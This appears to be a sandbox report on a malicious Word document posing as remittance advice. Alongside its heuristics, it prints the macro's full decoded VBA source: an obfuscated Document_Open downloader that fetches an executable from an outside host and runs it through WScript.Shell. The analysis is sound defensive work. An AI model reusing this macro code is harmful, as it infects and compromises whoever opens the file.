Verdict: MALICIOUS
Risk Score: 338
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute arbitrary commands or download further payloads. The document body presents itself as remittance advice, indicating a lure to trick the user into performing an action, likely related to payment fraud.
Heuristics (11)
- ClamAV: Doc.Dropper.Donoff-5743530-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `Dim gFhrfphULi As String, qqQWMQOv As Integer Set RsRHOxt = CreateObject("WScript.Shell") End Function`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Public Function BLwgX() As Object Set BLwgX = CreateObject("ADODB.Stream") End Function`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `Dim xtxWl As String OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2) End Function`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `End Function Private Sub Document_Open() Dim ZPDPHnj As Integer`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Fake invoice / payment lure (low, SE_INVOICE_LURE): Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9410 bytes |

SHA-256: e120635caa70ea9e37afb29499d2698984d28df981310822032a308828415916
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 173 of 245 identifiers look randomly generated (e.g. 'D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lXiYi() As Integer
hFrQPtBp
iOEGGBQELK
lXiYi = 4779
End Function
Private Sub Document_Open()
Dim ZPDPHnj As Integer
auEprygAY.lKWcTTtPJ
End Sub
Private Sub IyTFndQ(ByVal tWaHbJWa As Integer)
kKhjcbO
If kbFfJcWPDT("5FjTr4lJor1mKl1h1JBVm6sU", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "c4TFbvaAyIX5rWuREEh8ZkO", 762
End If
End Sub
Private Sub xpDvI(ByVal FwqWu As Integer, ByVal bKQsLfPtT As Integer)
WbFWObBP
End Sub
Private Sub charbjS(ByVal ouZXrRprh As String, ByVal WarvJN As Boolean)
hpyzkXXV "ZzKMg6L0yvZc1f9q6v2PJoAQPV", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "29PX0LE0fZL864UxOvYjjoi"
KvgAFCY
HSewNUUfX "3um6pEKi48VN7SZDmOp4i4Lai"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub
Attribute VB_Name = "AhMxBWnqtk"
Public Function BLwgX() As Object
Set BLwgX = CreateObject("ADODB.Stream")
End Function
Public Function bAOYIYwzVu() As Object
Dim wdcRVtTy As Integer
Set bAOYIYwzVu = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function RsRHOxt() As Object
Dim gFhrfphULi As String, qqQWMQOv As Integer
Set RsRHOxt = CreateObject("WScript.Shell")
End Function
Attribute VB_Name = "auEprygAY"
Private Function dZFlZbzB() As String
dZFlZbzB = soCxCNgfM.vEyNPDc("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function EsjjF() As String
Dim KNnxjYxl As Integer
Dim XSqpMFANqW As Boolean
EsjjF = jgIuHteWrZ(NxslbV, gCNEPU, gCNEPU) & wkSHQDT
End Function
Private Sub yUKCDGN(ByVal kNqvTwNQ As String, ByVal VHgEamb As Boolean, ByVal JNSTSTzs As Integer, ByVal YSvyOrq As Variant)
Dim CRUQckgk As Boolean, CwzbrzK As Integer
Set khkEFNwpi = AhMxBWnqtk.BLwgX
IcHxH.pbSzXF 708, soCxCNgfM.vEyNPDc("Taayqpae", "7qa."), 3110, 1, khkEFNwpi
IcHxH.VfBUigVqkN soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu"), khkEFNwpi
IcHxH.xvkmxtH soCxCNgfM.vEyNPDc("EWrQi3EteE", "3QEN"), 6128, khkEFNwpi, YSvyOrq, rGdFp
IcHxH.YQIiss kNqvTwNQ, 2, bDTFPqASYt, khkEFNwpi
IcHxH.VfBUigVqkN bsfybGhP, khkEFNwpi
End Sub
Private Sub nXiGR()
Dim SPxvjqou As Boolean, OBfNwD As String
On Error GoTo UFFVJKr
jJZPfnZK 2612, EsjjF, yMMoecQyj
sBZbi EsjjF
RPCxFN = "f0hdcBgLhhKoSzKpHR3Fi"
Exit Sub
vkLGZ = 5682
UFFVJKr:
End Sub
Private Function rGdFp() As String
rGdFp = "CnzyqzlK02NiKl6u9f0"
End Function
Private Sub sBZbi(ByVal VVedtni As String)
IcHxH.xvkmxtH SXTEF, 6128, AhMxBWnqtk.RsRHOxt, VVedtni, zAbbQBDn
End Sub
Private Function zAbbQBDn() As String
zAbbQBDn = "mO0qpdr8ltDdA9zhvwHnvXdEfIETVq3qi"
End Function
Private Function jgIuHteWrZ(ByVal mbRPl As String, ByVal oYlYSIynSk As String, ByVal beruZwqxJz As String) As String
Dim RwsXvwx As String
JixRwEJkN = False
Set MJmjj = IcHxH.REnyVsUSe(soCxCNgfM.vEyNPDc("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, AhMxBWnqtk.RsRHOxt, soCxCNgfM.vEyNPDc("wPR6Od6CdESwiS", "xdtw6i"))
jgIuHteWrZ = MJmjj(mbRPl)
End Function
Private Function yMMoecQyj() As String
Dim AUjlAPk As Boolean
Dim jdqfOANBzu As Boolean
yMMoecQyj = BFppclZqB
End Function
Private Function SEcuPpcS() As String
NXgcHedZ = "DKva5T1tzt9uNk8v4XRls0dGWsm"
SEcuPpcS = soCxCNgfM.vEyNPDc("S2Ce2nd2", "2Co")
End Function
Private Function BFppclZqB() As String
BFppclZqB = soCxCNgfM.vEyNPDc("hXt8XtpX:X/XX/Xol80c0ayX0f0o0to8g0r8XafX.0c0o0mX/08sy8s08t0e8m/0c0Xa8ch08e/88wXo8r0d.8e8x08e", "0X8")
End Function
Private Function wkSHQDT() As String
Dim osqqg As String
wkSHQDT = PgjYTcLSA
End Function
Private Function bsfybGhP() As String
bsfybGhP = soCxCNgfM.vEyNPDc("Ciliopiske", "tkpi")
End Function
Private Sub cWunX(ByVal IdapnfkR As Integer, ByVal GnovfyogN As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "XoamEjGkrsULGIYVxAdTAtN"
End Sub
Private Function SXTEF() As String
JywcHztmR = "zRHMmUrWttZzZ9pZy0DhYO2ZT"
SXTEF = soCxCNgfM.vEyNPDc("rEWxteWc", "1rWt")
End Function
Private Function xOZypMMv() As String
If pjTUCKd(5843, "WJkEt1QVkfJatERcy") Then
zeMphePZDz 1173, "zWo3eg5qzn72lf0oXj"
zUtoVINdP 2806, "D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD", 559
jvyLJjMjyn
End If
xOZypMMv = "bNUq5BQ0ZBhpt9kbPuBaAnrch"
End Function
Private Function FQymqif() As String
FQymqif = soCxCNgfM.vEyNPDc("MZPoZziZPllPaPx/5xZ.0ZP P(xcoZmZpxaPtZZiZbZlZe;xx PMZSxIPE ZP9.Px0;PZ PWxinxxdPowPsPP PNPTP P7Z.1x;x PxTrxPixdePxnZt/P5x.P0P)P", "PxZ")
End Function
Private Function Xjuzm() As String
Xjuzm = soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu")
End Function
Private Sub jJZPfnZK(ByVal tisIc As Integer, ByVal GefBHbzaXv As String, ByVal FaoowUobC As String)
Dim cLion As Integer, QmSSGLrIL As Integer
Set hGAjCtoVF = AhMxBWnqtk.bAOYIYwzVu
vAhuigCxLB = "9xhByeXuU4T8HBZF8Hhk5uhAYB"
IcHxH.SmzXbpy False, soCxCNgfM.vEyNPDc("6GE Ta", " a96S"), False, FaoowUobC, Xjuzm, hGAjCtoVF
IcHxH.YQIiss soCxCNgfM.vEyNPDc("U.sNeTNrN-ANgNTenNt.", "mT.N"), FQymqif, soCxCNgfM.vEyNPDc("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), hGAjCtoVF
IcHxH.VfBUigVqkN SEcuPpcS, hGAjCtoVF
yUKCDGN GefBHbzaXv, True, 3347, IcHxH.OxyRpTO(hGAjCtoVF, dZFlZbzB)
End Sub
Private Function PgjYTcLSA() As String
PgjYTcLSA = soCxCNgfM.vEyNPDc("/oo86ioeh7h1i8i1bh6on9nbenn41oic3i.iheoxoe", "ohin")
End Function
Public Sub lKWcTTtPJ()
Dim SqJSN As Integer
nXiGR
End Sub
Private Function khqaO() As Integer
WmkFh
cIsPekWV 9366
khqaO = 9266
End Function
Private Function gCNEPU() As String
gCNEPU = "ZsQRpJyqrEfx0pahbORP4CIPxKWxB8"
End Function
Private Function bDTFPqASYt() As String
bDTFPqASYt = soCxCNgfM.vEyNPDc("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function NxslbV() As String
NxslbV = soCxCNgfM.vEyNPDc("ZTEZIMPZ", "ZoWIO")
End Function
Attribute VB_Name = "gfYLB"
Private Sub fCYrmmp(ByVal KHSZKSELI As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub meivLAFp()
UKUhJchCfN False
UOlvZCoKSe "lPgLNAgVIX6iGi8oYQ", 3119
BWDat "IBlZXr1cC7xCrTXSY"
End Sub
Private Function EwykVwBOmO(ByVal MPRjdx As String, ByVal PvrVyPhX As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
EwykVwBOmO = True
End Function
Private Sub THUJA(ByVal vxUtLeX As Boolean, ByVal oajGKRL As String)
mokZnpH
HulbI "oacgqxYhSECRMY4eq"
End Sub
Public Function dnBNLei(ByVal MvdRYUs As String, ByVal AIRHvAL As String, ByVal GYaCQeX As Integer) As Boolean
Dim nRofJwYlF As Boolean
dnBNLei = InStr(1, AIRHvAL, MvdRYUs)
End Function
Public Function OnRDVW(ByVal WNvRt As String, ByVal GwdDFPw As Integer) As String
Dim KTkUIkFCNQ As Boolean
Dim FAWvHmr As Boolean
OnRDVW = Mid(WNvRt, GwdDFPw, 1)
End Function
Attribute VB_Name = "IcHxH"
Public Function OxyRpTO(ByVal StJxh As Object, ByVal WoVjdRAKfa As String) As Variant
Dim xtxWl As String
OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2)
End Function
Public Sub YQIiss(ByVal AWdDQXq As Variant, ByVal kUTFuiOT As Variant, ByVal dVNMpzEm As String, ByVal AXtBhR As Object)
CallByName AXtBhR, dVNMpzEm, 1, AWdDQXq, kUTFuiOT
End Sub
Public Sub xvkmxtH(ByVal kfMoXx As String, ByVal KOrQktg As Integer, ByVal oQsYFaipbj As Object, ByVal zSNkARtup As Variant, ByVal pjLwYjHcHG As String)
Dim kpyPvtMf As Boolean, YoAekV As String
CallByName oQsYFaipbj, kfMoXx, 1, zSNkARtup
End Sub
Public Sub VfBUigVqkN(ByVal sqQziJwCV As String, ByVal zQtloNToEj As Object)
Dim WHHPra As Integer, klFXu As Integer
CallByName zQtloNToEj, sqQziJwCV, 1
End Sub
Public Sub SmzXbpy(ByVal ZmiGKjq As Variant, ByVal YMxYm As Variant, ByVal VZqoptNc As Boolean, ByVal ogEFVZ As Variant, ByVal ZxlAx As String, ByVal rYmhaGJjfR As Object)
Dim qgeAaTMvRR As Boolean
OWoNkkz = "pfDcWhis0AOoI5zRyACmudMYD4"
CallByName rYmhaGJjfR, ZxlAx, 1, YMxYm, ogEFVZ, ZmiGKjq
End Sub
Public Function REnyVsUSe(ByVal UqIzKPrw As String, ByVal LCyerT As Boolean, ByVal hRehlfcJ As Integer, ByVal rYmhaGJjfR As Object, ByVal dHMvg As String) As Variant
Set REnyVsUSe = CallByName(rYmhaGJjfR, UqIzKPrw, 2, dHMvg)
End Function
Public Sub pbSzXF(ByVal YwvQDL As Integer, ByVal GHFpuhEmqy As String, ByVal blmJbadm As Integer, ByVal KrfhkIQ As Variant, ByVal CuQNug As Object)
Dim wYgUzAg As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName CuQNug, GHFpuhEmqy, 4, KrfhkIQ
End Sub
Attribute VB_Name = "soCxCNgfM"
Private Function AmBcob() As Boolean
puBqPC False, "wcHmthIEmg8DzeiqikJFtX8aSt"
AmBcob = True
End Function
Private Sub dMsbUxo(ByVal LdovjYvQ As String, ByVal aTrLc As Integer)
oRQsMB
End Sub
Public Function vEyNPDc(ByVal CbYXQ As String, ByVal ESrwfOX As String) As String
Dim UNuqY As Boolean, JgXpwpW As String
For IDypBIHSaE = 1 To Len(CbYXQ)
UNuqY = gfYLB.dnBNLei(gfYLB.OnRDVW(CbYXQ, IDypBIHSaE), ESrwfOX, 638)
MWgdETofR = 5559
If Not UNuqY Then
vEyNPDc = vEyNPDc & gfYLB.OnRDVW(CbYXQ, IDypBIHSaE)
LICDvxAOy = 7085
End If
Next
End Function
Private Function fNLPNyer() As Boolean
RiNRh 3745
fNLPNyer = True
End Function
Private Function oiIXlLkw(ByVal kEGKxM As Integer, ByVal MwVzL As Integer) As String
wzDcvaHzAL "FGu2ctX0CTLhs2iTdp5ZKy"
lLNzEN 414
yvqqniWt 6874, False, True
oiIXlLkw = "2VN10NB0l4aEcke4j1Ius"
End Function